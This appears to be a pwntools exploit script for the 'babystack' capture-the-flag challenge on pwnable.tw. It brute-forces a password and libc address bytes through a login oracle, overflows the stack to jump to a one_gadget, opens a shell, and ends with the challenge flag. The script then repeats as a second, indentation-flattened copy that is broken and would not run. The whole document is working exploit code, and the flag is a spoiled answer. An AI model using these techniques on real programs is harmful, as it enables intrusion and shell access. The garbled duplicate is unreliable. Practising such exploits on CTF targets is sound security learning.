H4niz/bbst.py

## bbst.py
#!/usr/bin/env python


from pwn import *

__DEBUG__ = 0
__FILE__ = "./babystack"
ELF(__FILE__)
__BIN__ = ""
__HOST__ = "chall.pwnable.tw"
__PORT__ = 10205


__DEBUG__ = int(raw_input("__DEBUG__\n> "))

if __DEBUG__:
	io = process(__FILE__)
	__LIBC__ = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
	one_gadget = 0xf1147

else:
	io = remote(__HOST__, __PORT__)
	__LIBC__ = ELF("libc_64.so.6")
	one_gadget = 0xf0567

# context.log_level='debug'
#
magic_copy = 0x24


def login(p, endline=True):
	io.recvuntil(">>")
	io.send("1")

	io.recvuntil(":")
	if endline:
		io.sendline( str(p) )
	else:
		io.send( str(p))

def magic(p):
	io.recvuntil(">>")
	io.send("3")

	return io.send( str(p) )

def brutepass(passwd='', l=0x10, begin=1):
	count = 1
	# passwd = ""
	while( count <= l ):
		for i in xrange(begin, 0x100):
			print count
			login( passwd+chr(i))
			res = io.recvuntil("!")
			if "Success" in res:
				passwd += chr(i)
				print "Passwd: %s"%passwd
				count +=1
				io.sendline("1")
				break

	return passwd


passwd = brutepass()
print "[+] Passwd found: " + repr(passwd)
print "[+] Len: ", len(passwd)

pwd = passwd
pwd += "1"*8
pwd += "2"*8
pwd += "3"*8

log = passwd.ljust(0x40, "P")
log += "R"*8

pwd = "R"*8

breakpoints = """
				brva 0xEBB
				brva 0xF87
			"""


login(log, endline=False)
login("\x00")

magic("M"*0x3f)
io.recvuntil("copy !")
io.sendline('1')

if __DEBUG__:
	gdb.attach(io)


libc = ''
count = 0
while( count < 6):
	for j in range(0x1, 0x100):
		login( pwd + chr(j) )
		res = io.recvuntil("!")
		if "Success" in res:
			libc += chr(j)
			pwd += chr(j)
			io.sendline("1")
			count += 1
			break


libcbase = u64(libc.ljust(8, "\x00")) - __LIBC__.symbols['_IO_file_setbuf'] - 9
ret = libcbase + one_gadget

print "[-] libcbase: %#x"%libcbase
print "[-] ret: %#x"%ret

log = passwd.ljust(0x40, "P")
log += passwd
log += p64(0x3131313131313131)
log += "B"*16
log += p64(ret)

login(log, endline=False)
login("\x00")
magic("M"*0x3f)


io.recvuntil("copy !")
io.sendline("2") #triggeru
io.sendline("cat flag")
io.interactive()

#FLAG{Its_juS7_a_st4ck0v3rfl0w}
	#!/usr/bin/env python


	from pwn import *

	__DEBUG__ = 0
	__FILE__ = "./babystack"
	ELF(__FILE__)
	__BIN__ = ""
	__HOST__ = "chall.pwnable.tw"
	__PORT__ = 10205


	__DEBUG__ = int(raw_input("__DEBUG__\n> "))

	if __DEBUG__:
	io = process(__FILE__)
	__LIBC__ = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
	one_gadget = 0xf1147

	else:
	io = remote(__HOST__, __PORT__)
	__LIBC__ = ELF("libc_64.so.6")
	one_gadget = 0xf0567

	# context.log_level='debug'
	#
	magic_copy = 0x24


	def login(p, endline=True):
	io.recvuntil(">>")
	io.send("1")

	io.recvuntil(":")
	if endline:
	io.sendline( str(p) )
	else:
	io.send( str(p))

	def magic(p):
	io.recvuntil(">>")
	io.send("3")

	return io.send( str(p) )

	def brutepass(passwd='', l=0x10, begin=1):
	count = 1
	# passwd = ""
	while( count <= l ):
	for i in xrange(begin, 0x100):
	print count
	login( passwd+chr(i))
	res = io.recvuntil("!")
	if "Success" in res:
	passwd += chr(i)
	print "Passwd: %s"%passwd
	count +=1
	io.sendline("1")
	break

	return passwd


	passwd = brutepass()
	print "[+] Passwd found: " + repr(passwd)
	print "[+] Len: ", len(passwd)

	pwd = passwd
	pwd += "1"*8
	pwd += "2"*8
	pwd += "3"*8

	log = passwd.ljust(0x40, "P")
	log += "R"*8

	pwd = "R"*8

	breakpoints = """
	brva 0xEBB
	brva 0xF87
	"""


	login(log, endline=False)
	login("\x00")

	magic("M"*0x3f)
	io.recvuntil("copy !")
	io.sendline('1')

	if __DEBUG__:
	gdb.attach(io)


	libc = ''
	count = 0
	while( count < 6):
	for j in range(0x1, 0x100):
	login( pwd + chr(j) )
	res = io.recvuntil("!")
	if "Success" in res:
	libc += chr(j)
	pwd += chr(j)
	io.sendline("1")
	count += 1
	break


	libcbase = u64(libc.ljust(8, "\x00")) - __LIBC__.symbols['_IO_file_setbuf'] - 9
	ret = libcbase + one_gadget

	print "[-] libcbase: %#x"%libcbase
	print "[-] ret: %#x"%ret

	log = passwd.ljust(0x40, "P")
	log += passwd
	log += p64(0x3131313131313131)
	log += "B"*16
	log += p64(ret)

	login(log, endline=False)
	login("\x00")
	magic("M"*0x3f)


	io.recvuntil("copy !")
	io.sendline("2") #triggeru
	io.sendline("cat flag")
	io.interactive()

	#FLAG{Its_juS7_a_st4ck0v3rfl0w}